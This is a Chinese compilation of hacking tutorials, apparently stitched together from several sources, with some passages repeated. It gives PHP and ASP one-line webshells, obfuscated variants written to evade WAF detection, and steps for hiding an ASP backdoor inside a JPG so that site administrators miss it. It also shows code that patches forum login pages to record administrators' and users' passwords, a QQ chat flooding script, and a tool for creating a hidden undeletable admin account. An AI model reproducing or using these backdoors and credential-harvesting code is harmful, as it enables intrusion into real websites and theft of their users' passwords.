一句话木马图片制作(三种方法)

木马的常用伪装手段在网络安全领域，木马是一种恶意软件，可以在不被用户察觉的情况下悄悄地进入计算机系统，实现盗取用户信息、破坏系统的行为。

因此，木马程序的伪装手段非常重要，可以使其更容易地潜入计算机系统。

以下是一些常用的木马伪装手段：1. 伪装成正常程序许多木马程序被设计成伪装成常见的软件或系统组件，例如浏览器插件、媒体播放器、下载器等，以此混淆用户的视觉，避免受到用户的怀疑，从而更容易渗透进入用户的系统。

2. 终端木马伪装终端木马常被伪装成程序源码、编译工具或其它网络安全工具来骗取用户信任，而终端木马常常伴随着对受害者机器的远程控制，拥有非常广泛的攻击能力。

3. 使用非常规的文件扩展名很多木马程序使用并不常见的文件扩展名，比如".txt"、".jpg"、".pdf"等，以绕过一些计算机安全防护软件的检测。

在实际应用过程中，我们应该避免打开不熟悉的文件。

4. 嵌入宏或脚本很多木马程序将自己嵌入到宏或脚本中，然后利用漏洞自动执行，从而绕过了常规的安全检测。

例如，利用办公软件（Word、Excel等）中的宏病毒的攻击方式。

5. 嵌入加密模块有些木马程序会嵌入加密模块，使得其内容在传输过程中无法被轻易识别和拦截，从而达到对计算机系统的“偷窃”。

综上所述，木马程序有很多伪装手段，其中有些是非常难以被发现的。

因此，我们需要时刻保持警惕，使用网络安全软件来防范这些木马程序的攻击，同时也需要提高自己的网络安全意识，确保个人计算机和重要信息的安全。

除了上述常用的木马伪装手段，还有一些更高级的木马伪装手段。

这些高级伪装手段越来越普遍，它们可以更好地欺骗人们的眼睛和虚拟机器的安全防御。

以下是一些高级木马伪装技术：1. 避免反病毒软件现在的反病毒软件具有越来越高的检测能力，它们能够及时发现木马程序并抵御攻击。

因此，一些高级的木马程序会通过加密自己来避免反病毒软件的检测与抵抗。

PHP8种⼀句话⽊马⼀句话⽊马书写：为什么是⼀句话⽊马，因为他可以通过函数接收指定的参数来让我们的操作系统执⾏指定的命令 1.eval函数<?php eval($_REQUEST['a]);?> 2.assert函数(php官⽅在php7中更改了assert函数。

在php7.0.29之后的版本不⽀持动态调⽤。

也就是7.0.29之后⽆法执⾏命令)<?php assert($_REQUEST["a"]); ?> 3.匿名⽅法构造<?php func=create_function('',$_POST['a']); func();?> 4.array_map的书写⽅式： <?php$func = $_POST['a'];$arr = array($_POST['b']);news = array_map($func, $arr);?> 5.call_user_func(⽅法名,参数) 把接受的第⼀个值当作回调函数调⽤，其余参数作为回调函数的参数<?php$a = $_GET['a'];call_user_func(assert,$a);//书写为⼀句//call_user_func(assert,$_GET['a']);?> 6.array_filert(⽅法名,数组)<?php//函数过滤器，学过python的⼩伙伴⼀定看的懂，就是将数组中的每个值放到指定的函数中，返回⼀个只含有true的结果，上⽅的array_map也和python的map函数基本相像$arr = array_filert($_GET['func'],array($_GET['a']));?> 7.⽂件操作函数：⽣成⼀个之前的⼀句话⽊马，<?php$test='<?php eval($_POST['a']);?>';file_put_contents('test1.php',$test);//⼀句话的书写⽅式fputs(fopen('a.php','w'),'<?php assert($_POST["a"]?>');?> 8.动态函数调⽤：接收⼀个函数作为函数名，⼀个函数作为参数进⾏动态调⽤<?$_GET['func']($_GET['a']);?>。

⼀句话⽊马简介⼀句话⽊马的原理即可以执⾏传递上来变量的内容，变量名称即“⼀句话密码”，变量内容即后门执⾏代码，内容可以是list⽂件、上传及下载⽂件、数据库操作等等。

这类后门通常只⼀⾏代码，因此可以随意插⼊web站点的正常⽂件⽽并不影响原本代码的执⾏，甚⾄与正常图⽚的结合可以形成“图⽚马”。

体积⼩，隐蔽性强是⼀句话⽊马最⼤的优势。

灵活的变量内容同时成就了很多经典的⼀句话操作客户端，如菜⼑。

php⽊马剖析我们来对下⾯这样的⼀个⼀句话进⾏简单剖析：<?php eval($_POST['bckdor']);?>这是php的⼀句话后门中最普遍的⼀种。

它的⼯作原理是这样的：⾸先存在⼀个变量，变量名为bckdor，bckdor的取值为HTTP的POST⽅式。

Web服务器对bckdor取值以后，然后通过eval()函数执⾏bckdor⾥⾯的内容。

php⽊马使⽤做⼀个⼀句话⽊马：p.php直接上burp，试⼀个最简单的命令可以看到，uname -a，正常运⾏，且将结果返回回来。

⼀句话的⽆数变种下⾯是⼀些发散思维。

1，可以利⽤preg_replace，当有e修饰符时，可以直接运⾏替换的字符串。

例⼦如下：<?phpsession_start();$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);$_SESSION['theCode']&&preg_replace('\'a\'ei', 'e'.'v'.'a'.'l'.'($_SESSION[\'theCode\'])', 'a');>不过可以看到，连php官⽅都意识到了这⾥存在的漏洞，所以在7.0版本，明确不再⽀持/e修饰符，不过 <7.0 还是存在这个问题的2，利⽤编码，甚⾄迭代编码<?php $f = base64_decode($_GET['g']); $f($_POST['c']); ?>3，利⽤字符的各种颠倒<?php$str = 'aerst';$funct = $str{0}.$str{3}.$str{3}.$str{1}.$str{2}.$str{4};@$func($_POST['c']);>4，字符拼接，编码拼接等等<?php $c=$_GET[n].'t';@$c($_POST[cmd]);?><?php $c=base64_decode('YXNzZXI=').$_GET[n].'t';@$c($_POST[cmd]);?>有兴趣的还可以再进⼀步研究，下次分析客户端。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。

PHP之⼀句话⽊马什么是⼀句话⽊马⼀句话⽊马就是只需要⼀⾏代码的⽊马，短短⼀⾏代码，就能做到和⼤马相当的功能。

为了绕过waf的检测，⼀句话⽊马出现了⽆数中变形，但本质是不变的：⽊马的函数执⾏了我们发送的命令。

我们如何发送命令，发送的命令如何执⾏？我们可以通过GET 、POST 、COOKIE这三种⽅式向⼀个⽹站提交数据，⼀句话⽊马⽤$_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据，并把接收的数据传递给⼀句话⽊马中执⾏命令的函数，进⽽执⾏命令。

所以看到的经典⼀句话⽊马⼤多都是只有两个部分，⼀个是可以执⾏代码的函数部分，⼀个是接收数据的部分。

例如：<?php eval(@$_POST['a']); ?>其中eval就是执⾏命令的函数，$_POST['a']就是接收的数据。

eval函数把接收的数据当作PHP代码来执⾏。

这样我们就能够让插⼊了⼀句话⽊马的⽹站执⾏我们传递过去的任意PHP语句。

这便是⼀句话⽊马的强⼤之处。

⽰例：使⽤其他函数制作⼀句话⽊马assert函数<?php assert(@$_POST['a']); ?>create_function函数<?php$fun = create_function('',$_POST['a']);$fun();>把⽤户传递的数据⽣成⼀个函数fun()，然后再执⾏fun()call_user_func回调函数<?php@call_user_func(assert,$_POST['a']);>call_user_func这个函数可以调⽤其它函数，被调⽤的函数是call_user_func的第⼀个函数，被调⽤的函数的参数是call_user_func的第⼆个参数。

1.名称：自己如何动手制作图片形式的ASP木马（还要可显示图片）建一个asp文件，内容为找一个正常图片ating.jpg，插入一句话木马（比如冰狐的）,用ultraedit进行hex编译，插入图片里，为了运行成功，还要搜索 shell代码插在这里，最好是小马，还要加密一下访问的时候在你作手脚的asp文件后面加上?action=ok,即可 (2)另一种方法，在我们要做手脚的asp文件里加入如下内容访问的时候在做手脚的asp文件后面加上?filer=XXX XXX 为你本地上传的一个路径如 c:ating123.asp 上传后在做手脚的asp的同文件夹中有ating,asp （3）前提得到system权限，进入网站目录下一层 mkdir s… copy ating.asp s…/ 这样杀毒软件找不到的访问http://网站/s…/ating.asp即可 6. 工具/chaojiyonghu.rar，此工具在该电脑生成一个超级用户用户名为：hack 密码110，在DOS下和计算机管理器上看不到你建立的用户，并且是删除不掉的. 7．名称：QQ群脚本攻击打开qq对话诓，复制消息，然后下面的内容保存为.vbs 文件，运行即可 Set WshShell= WScript.createobject("WScript.Shell") WshShell.AppActivate "QQ信息攻击脚本" for i=1 to 20 WScript.Sleep 1000 WshShell.SendKeys"^v" WshShell.SendKeys i WshShell.SendKeys "%s" Next 8．搜索：程序制作：万鹏有免费申请空间的，直接上传asp马即可 9. 名称：全面找出你站上的ASP木马（1）用杀毒软件（2）用FTP客户端软件，点"工具"->"比较文件夹" （3）用asplist2.0.asp上传到站点空间查看，一般功能多的ASP我估计就是ASP木马（4）用工具Beyond Compare 10名称：拓展思路拿DVBBS帐号 "一个人的圣经"的动画（1）以前获得webshell后想进入DVBBS的后台,想要管理员的密码，可以这样老办法: 修改admin_login.asp得到明文DVBBS后台密码在"username=trim(replace(request("username")这行后面 Dim fsoObject Dim tsObject Set fsoObject = Server.createObject("Scripting.FileSystemObject") set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt")) tsObject.Write CStr(request("password")) Set fsoObject = Nothing Set tsObject = Nothing 只要管理员登陆后台，在目录下就生成了laner.txt （2）login.asp中Case "login_chk"下: on error resume next Dim rain set rain=server.createobject("adodb.stream") rain.Type=2 rain.CharSet="gb2312" rain.Position=rain.Size rain.Open rain.LoadFromFile server.MapPath("laner.asp") rain.writetext now&request("username")&"text:"&request("password")&chr(10) rain.SaveToFile server.MapPath("laner.asp"),2 rain.Close set rain=nothing 这样laner.asp将获得全部登陆人的登陆时间，用户名和密码（3）如果你有自己的网站或者另外的webshell(强烈建议使用): 可以建立目录laner,在里面建立一个空的laner.asp和如下代码的rain.asp: 11. 名称：利用QQ在线状态抓鸽子肉鸡生成qq在线状态，把里面的地址改成木马地址，发到论坛在login.asp那里插入一句: response.write""response.write"" 结果所有登陆人都会乖乖的把名字和密码送到你的laner.asp 里 12. 动画名称：媒体中国整站程序存在多处漏洞漏洞程序:媒体中国整站程序(第一版) 官方网站:/ 漏洞: %5c(暴库) 上传注入上传页面:down1/upload.asp 13. 名称：免费电话＋MSH命令行工具 / 打开主页，点击坐下角，Free DownLoad，下载到本地，安装，运行后，会提示正在寻找你所在地区的区号。

图片木马制作的三种方法Copy命令制作1.asp内容：打开cmd，数据一下命令：此时打开两个jpg文件，相比：且打开2.jpg可以像1.jpg一样显示图像。

把以下代码放入目标网站，即可按asp执行。

<% #include files=”2.jpg”%>Uedit32（转载）：本制作来自于：雪糕。

我们通常在得到webshell之后都想给自己留个后门，等下次或以后有用得到的时候再进来看看。

但如果直接加入一句话木马<%execute request("value")%>到asp文件中时，在该页面上就会有类似如下的错误：Microsoft VBScript 运行时错误错误'800a000d'类型不匹配: 'execute'/news1/show.asp，行 3所以我们就可以开动脑筋了，使用插入一句话木马的图片做我们的后门。

而且我们如果有足够的权限的话（希望网站中的文件可写），就直接把网站原有的图片变成后门，然后在那个asp文件中加入调用图片后门的代码：<!--#include file="图片后门地址"-->这样就没有上面的“类型不匹配: 'execute'”错误了，而且也更好的隐藏了我们的后门。

新挑战始终会伴着新事物的出现而出现，当我们直接将我们的一句话木马的asp文件改成jpg 或gif文件的时候，这个图片文件是打不开的，这又容易被管理员发现。

然后我们就又开始思考并寻找新的方法：制作可以显示图片内容的图片格式后门。

制作步骤：一、前期准备材料：1.一张图片：1.jpg2.一句话木马服务器端代码：<%execute request("value")%>（其他的一句话也行）3.一句Script标签：<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT>一句话木马服务器端代码</SCRIPT>4. 调用图片后门代码：<!--#include file="图片地址"-->工具：UltraEdit二、开始制作：1.使用UltraEdit打开1.jpg文件，然后按CTRL +F 进行查找图片中的“<%”和“%>”其中<%的十六进制代码是3E 25，那么%>就应该是25 3E，但是我们只把25改成00；之后我们在新建一个文本编辑窗口，将我们的script标签代码<SCRIPT RUNAT=SERVER LANGUAGE=JA V ASCRIPT><%execute request("value")%></SCRIPT>复制进去，然后点击右键选择十六进制编辑命令，这样会跳转到十六进制数据窗口，复制所有的十六进制的数据，粘贴到1.jpg的十六进制编辑窗口的最下面，说明：为什么要粘贴到最下面？假设你把srcipt标签的十六进制代码粘贴到中间的话，就会破坏图片的完整性，那样下面的图片就看不到了，但是插入的一句话代码还是起作用的。